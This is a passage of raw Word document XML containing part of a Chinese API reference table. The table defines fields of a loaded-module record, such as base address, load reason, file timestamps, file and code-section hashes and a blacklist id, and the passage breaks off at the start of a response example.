          <w:p w14:paraId="1AA47E1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="338698C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块基址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C418488" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D4A3C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>load_reason</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="109B52C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31C23A3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0340E944" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>加载原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="111606D9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28864368" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41D4A9D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1684C519" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8A0CB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F60240E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="151161D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>load_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56E23E21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40766276" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18AC26FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>加载时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C7D44BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="465401C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD42CB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C36B80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48FFE83D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01F35199" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC261E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18317ABC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D3E4627" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1916276D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="297F142B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8E1B9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC66FB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43B89EDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CB366E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CED0B71" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B357936" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D77B9F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15257500" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59062CAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63053818" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDCCE0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DD8FCE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="586ABDEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1204F3AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4ECECDFD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A45E169" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E55A2D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC152CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3592763D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E479548" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC135DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053BEF53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6758F1D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A425870" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DECDC89" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B36C7C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F9A9786" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48B3CA0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="345AE416" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68CD7AC7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22D5449F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB63ADC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BFD057A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64C80750" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E0600CC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DEC01A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="520849F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2309A06F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435C7BCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="658E259F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57597B15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ED3C0D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C994395" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC2784E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D00AA5C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19462413" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E2A22D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7477CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E250368" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="729E54DA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D9475BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5375F0A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E9D654B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2743E469" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="147B6FB0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2A1EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE82A91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EB5D457" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009FFB61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E78764C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F3243" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
